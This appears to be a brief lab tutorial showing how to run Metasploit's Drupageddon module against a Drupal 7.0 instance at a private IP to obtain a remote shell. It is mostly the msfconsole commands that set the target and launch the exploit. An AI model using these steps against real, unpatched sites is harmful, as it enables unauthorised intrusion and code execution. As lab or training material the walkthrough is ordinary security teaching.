Exploit Drupal using HTTP Parameter Key/Value SQL Injection

This module exploits the Drupal HTTP Parameter Key/Value SQL Injection (aka Drupageddon) in order to achieve a remote shell on the vulnerable instance. This module was tested against Drupal 7.0 and 7.31 (was fixed in 7.32).

 Exploit Targets

Drupal 7.0

Requirement

Attacker: kali Linux

Victim PC: Drupal 7.0

Open Kali terminal type msfconsole

Now type use exploit/multi/http/drupal_drupageddon

msf exploit (drupal_drupageddon)>set targeturi /drupal/

msf exploit (drupal_drupageddon)>set rhost 192.168.0.109 (IP of Remote Host)

msf exploit (drupal_drupageddon)>set rport 80

msf exploit (drupal_drupageddon)>exploit         

Leave a Reply

Your email address will not be published. Required fields are marked *